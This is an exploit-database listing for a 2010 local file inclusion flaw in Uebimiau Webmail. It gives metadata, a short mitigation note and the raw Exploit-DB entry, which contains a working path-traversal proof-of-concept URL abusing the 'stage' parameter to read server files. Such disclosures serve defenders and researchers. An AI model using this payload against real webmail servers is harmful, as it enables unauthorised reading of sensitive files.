header-logo
Suggest Exploit
vendor:
Uebimiau
by:
Blake
7,5
CVSS
HIGH
Local File Inclusion
22
CWE
Product Name: Uebimiau
Affected Version From: 3.2.0
Affected Version To: 2.0
Patch Exists: N/A
Related CWE: N/A
CPE: a:t-dahmail:uebimiau
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3
2010

Uebimiau Webmail Local File Inclusion

The stage parameter is not properly sanitized, allowing an attacker to read arbitrary files on the server.

Mitigation:

Input validation should be used to prevent the inclusion of arbitrary files.
Source

Exploit-DB raw data:

# Exploit Title: Uebimiau Webmail Local File Inclusion
# Date: 10-04-10
# Author: Blake
# Software Link: http://sourceforge.net/projects/t-dahmail/files/latest/Uebimiau_3.2.0_2.0_Alpha.zip/download
# Version: 3.2.0-2.0
# Tested on: Windows XP SP3 running xampp lite

The stage parameter is not properly sanitized.

POC:
http://127.0.0.1/webmail/admin/install/index.php?stage=../../../../../../../../../boot.ini%00&lid=

Navigation

Suggest Exploit

Services By CQR